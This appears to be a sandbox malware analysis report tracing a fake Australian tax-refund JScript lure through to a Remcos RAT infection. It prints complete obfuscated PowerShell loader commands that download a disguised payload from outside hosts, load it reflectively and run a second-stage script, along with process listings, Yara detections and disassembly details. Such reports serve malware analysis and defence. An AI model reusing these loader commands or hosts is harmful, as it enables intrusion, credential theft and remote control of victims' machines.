2025-01-05 07:33:17 UTC	1369	IN	Data Raw: 32 30 30 30 0d 0a 57 33 4d 6c 4e 70 51 54 4c 7a 30 31 4d 2b 4d 44 48 79 34 71 4d 4d 4b 44 66 79 63 6d 4d 64 46 44 76 78 63 61 4d 65 47 54 6b 78 59 59 4d 77 45 44 4b 78 4d 41 4d 37 44 54 7a 77 59 4d 4d 31 43 7a 71 77 45 4b 4d 61 43 7a 69 77 55 49 4d 2b 42 7a 63 41 41 41 41 30 42 41 42 41 43 67 50 33 37 44 37 2b 77 6f 50 30 34 6a 4c 2b 67 69 50 56 34 7a 42 39 38 66 50 6f 33 6a 33 39 4d 64 50 4e 33 44 79 39 4d 61 50 61 32 6a 64 39 34 57 50 76 30 7a 4a 38 59 4f 50 62 7a 44 69 38 49 49 50 62 77 7a 45 38 55 77 4f 39 76 44 39 37 73 2b 4f 6a 76 7a 32 37 4d 39 4f 49 76 6a 74 37 34 36 4f 69 75 6a 6d 37 45 35 4f 49 75 44 67 37 67 33 4f 77 74 44 61 37 73 31 4f 50 74 7a 52 37 6b 67 4f 64 72 54 73 36 6f 6f 4f 45 71 6a 66 36 67 6e 4f 77 70 44 62 36 45 6d 4f 53 70 6a 52 Data Ascii: 2000W3MlNpQTLz01M+MDHy4qMMKDfycmMdFDvxcaMeGTkxYYMwEDKxMAM7DTzwYMM1CzqwEKMaCziwUIM+BzcAAAA0BABACgP37D7+woP04jL+giPV4zB98fPo3j39MdPN3Dy9MaPa2jd94WPv0zJ8YOPbzDi8IIPbwzE8UwO9vD97s+Ojvz27M9OIvjt746Oiujm7E5OIuDg7g3OwtDa7s1OPtzR7kgOdrTs6ooOEqjf6gnOwpDb6EmOSpjR
2025-01-05 07:33:17 UTC	1369	IN	Data Raw: 4c 4e 6a 53 54 6a 30 34 48 4e 4f 52 6a 4d 30 38 78 4d 34 50 6a 34 79 34 71 4d 39 4a 6a 63 79 63 6c 4d 7a 49 7a 46 79 55 41 4d 66 44 54 77 77 4d 4b 4d 65 42 41 41 41 41 4c 41 45 41 43 41 41 41 77 50 30 39 7a 5a 2f 63 31 50 4b 35 6a 6b 2b 49 6c 50 41 35 7a 4d 2b 67 69 50 45 30 44 31 39 63 63 50 74 32 6a 51 39 49 77 4f 66 74 6a 53 35 30 45 4f 73 6a 6a 59 34 67 42 4f 44 63 54 71 33 59 6c 4e 4a 56 7a 61 31 67 55 4e 59 51 7a 42 41 41 41 41 45 42 41 42 51 41 41 41 41 67 7a 38 31 55 61 4e 49 57 6a 4e 30 41 39 4d 34 4b 7a 2b 79 49 73 4d 63 4b 44 59 78 4d 49 4d 52 43 44 59 41 41 41 41 6b 41 41 42 41 41 77 50 43 2f 54 66 2f 6f 6b 50 34 37 7a 79 2b 34 5a 50 73 33 7a 4e 39 63 77 4f 32 75 7a 62 37 51 78 4f 47 67 6a 7a 34 49 67 4e 74 4e 54 32 7a 6b 30 4d 6a 4d 6a 42 79 Data Ascii: LNjSTj04HNORjM08xM4Pj4y4qM9JjcyclMzIzFyUAMfDTwwMKMeBAAAALAEACAAAwP09zZ/c1PK5jk+IlPA5zM+giPE0D19ccPt2jQ9IwOftjS50EOsjjY4gBODcTq3YlNJVza1gUNYQzBAAAAEBABQAAAAgz81UaNIWjN0A9M4Kz+yIsMcKDYxMIMRCDYAAAAkAABAAwPC/Tf/okP47zy+4ZPs3zN9cwO2uzb7QxOGgjz4IgNtNT2zk0MjMjBy
2025-01-05 07:33:17 UTC	1369	IN	Data Raw: 4d 6c 41 6a 2f 77 67 4f 4d 69 44 44 31 77 38 4d 4d 4a 44 7a 77 77 30 4c 4d 34 43 6a 73 77 77 4b 4d 6d 43 54 6f 77 73 4a 4d 56 43 7a 6a 77 6f 49 4d 45 43 6a 66 77 67 48 4d 7a 42 54 62 77 63 47 4d 68 42 44 58 77 59 46 4d 51 42 6a 53 77 55 45 4d 2f 41 54 4f 77 4d 44 4d 75 41 44 4b 77 49 43 4d 63 41 7a 46 77 45 42 4d 4c 41 54 42 77 41 41 41 41 41 41 33 41 4d 41 55 41 38 6a 2b 2f 51 2f 50 75 2f 54 36 2f 4d 2b 50 64 2f 7a 31 2f 49 39 50 4d 2f 6a 78 2f 41 38 50 37 2b 54 74 2f 38 36 50 70 2b 44 70 2f 34 35 50 59 2b 6a 6b 2f 30 34 50 48 2b 54 67 2f 73 33 50 32 39 44 63 2f 6f 32 50 6b 39 7a 58 2f 6b 31 50 54 39 54 54 2f 67 30 50 43 39 44 50 2f 59 7a 50 78 38 7a 4b 2f 55 79 50 66 38 6a 47 2f 51 78 50 4f 38 44 43 2f 4d 67 50 39 37 7a 39 2b 45 76 50 73 37 6a 35 2b 41 Data Ascii: MlAj/wgOMiDD1w8MMJDzww0LM4CjswwKMmCTowsJMVCzjwoIMECjfwgHMzBTbwcGMhBDXwYFMQBjSwUEM/ATOwMDMuADKwICMcAzFwEBMLATBwAAAAAA3AMAUA8j+/Q/Pu/T6/M+Pd/z1/I9PM/jx/A8P7+Tt/86Pp+Dp/45PY+jk/04PH+Tg/s3P29Dc/o2Pk9zX/k1PT9TT/g0PC9DP/YzPx8zK/UyPf8jG/QxPO8DC/MgP97z9+EvPs7j5+A

Target ID:	0
Start time:	02:31:56
Start date:	05/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tax_Refund_Claim_2024_Australian_Taxation_Office.js"
Imagebase:	0x7ff615820000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:31:58
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() \| ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:31:58
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:32:19
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C copy *.vbs "hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs"
Imagebase:	0x7ff7d25d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:32:19
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:32:20
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:32:20
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:32:21
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x4b0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	02:32:23
Start date:	05/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:32:24
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\yqrnzxuewrllgkpigkbsooiasehxvvunub"
Imagebase:	0x890000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:32:24
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\akwgap"
Imagebase:	0x7f0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:32:24
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy"
Imagebase:	0x200000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:32:24
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy"
Imagebase:	0x650000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:32:28
Start date:	05/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\smudgy.js"
Imagebase:	0x7ff615820000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:32:30
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLbCTNCSacaUBlznKdLL = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$BAKhKaLKKhUzWAiLoPeT = New-Object System.Net.WebClient;$CUcWoiOZbZlLkKfkLNKn = $BAKhKaLKKhUzWAiLoPeT.DownloadData($iLbCTNCSacaUBlznKdLL);$hnbcLZWZIRphWirWbKoP = [System.Text.Encoding]::UTF8.GetString($CUcWoiOZbZlLkKfkLNKn);$WdhGWGnCuzIoSWNGzakW = '<<BASE64_START>>';$IiaPzGlWLWAWULkdGasx = '<<BASE64_END>>';$oiGGvTReStQZLhKLLBWJ = $hnbcLZWZIRphWirWbKoP.IndexOf($WdhGWGnCuzIoSWNGzakW);$LcWLWIWLKiPfApOLgbhR = $hnbcLZWZIRphWirWbKoP.IndexOf($IiaPzGlWLWAWULkdGasx);$oiGGvTReStQZLhKLLBWJ -ge 0 -and $LcWLWIWLKiPfApOLgbhR -gt $oiGGvTReStQZLhKLLBWJ;$oiGGvTReStQZLhKLLBWJ += $WdhGWGnCuzIoSWNGzakW.Length;$khUWOGOLPuNkKWuNlJGL = $LcWLWIWLKiPfApOLgbhR - $oiGGvTReStQZLhKLLBWJ;$vZCZRhsdWpmjLCUemdQR = $hnbcLZWZIRphWirWbKoP.Substring($oiGGvTReStQZLhKLLBWJ, $khUWOGOLPuNkKWuNlJGL);$sHPbLeLWLSAKZkdaLmxt = -join ($vZCZRhsdWpmjLCUemdQR.ToCharArray() \| ForEach-Object { $_ })[-1..-($vZCZRhsdWpmjLCUemdQR.Length)];$AlkLoWLeqkLxkmviBqWi = [System.Convert]::FromBase64String($sHPbLeLWLSAKZkdaLmxt);$WxLPHeKiGUInbiBzcbRa = [System.Reflection.Assembly]::Load($AlkLoWLeqkLxkmviBqWi);$OLiclpBLBaWWdiULbLvU = [dnlib.IO.Home].GetMethod('VAI');$OLiclpBLBaWWdiULbLvU.Invoke($null, @($restoredText, 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'MSBuild', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','1','kSUPzeWAKqsWhWRWCogL','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:32:30
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	02:32:32
Start date:	05/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:32:32
Start date:	05/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	02:32:33
Start date:	05/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:3
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:32:41
Start date:	05/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6484 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:8
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:32:41
Start date:	05/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6796 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:8
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:33:17
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x3a0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:33:17
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x670000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2449621046.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Function 00007FFD9B5033B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2403952159.00007FFD9B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b500000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: ec7229420db5015fc2a550deb973307229bfb8ca3687b34d93668687e1692fa3
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 9401AC3011CB0C4FD744DF0CD051AA5B3E0FB95320F10056DE58AC3565DA32E882C741

Non-executed Functions

Function 00007FFD9B500B9A Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

+m\I, xrefs: 00007FFD9B500C34

Memory Dump Source

Source File: 00000006.00000002.2403952159.00007FFD9B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b500000_powershell.jbxd

Similarity

API ID:
String ID: +m\I
API String ID: 0-259408956
Opcode ID: 80394b39285b6d366fb8ab4dcaa8d627a5a3fc558d513aae51b2c5fd85ef0476
Instruction ID: 671127c7d9693a21d99243ec6029b213f4a00e11385b498fa436d05f12c1629e
Opcode Fuzzy Hash: 80394b39285b6d366fb8ab4dcaa8d627a5a3fc558d513aae51b2c5fd85ef0476
Instruction Fuzzy Hash: A6E1E993E0F5DE5FF7A356BC18790A47F90EF22A5471E01FBC4DC8A0EBA805690A8351

Analysis Process: MSBuild.exePID: 8152, Parent PID: 7912COMMON

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	9.2%
Signature Coverage:	1.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	89

Executed Functions

Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040DDAD

Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8

Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7

NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
_wcsicmp.MSVCRT ref: 0040DEB2
_wcsicmp.MSVCRT ref: 0040DEC5
_wcsicmp.MSVCRT ref: 0040DED8
OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
memset.MSVCRT ref: 0040DF5F
CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
_wcsicmp.MSVCRT ref: 0040DFB2
CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2

Strings

taskhost.exe, xrefs: 0040DEBD
dllhost.exe, xrefs: 0040DEA9
taskhostex.exe, xrefs: 0040DED0

Memory Dump Source

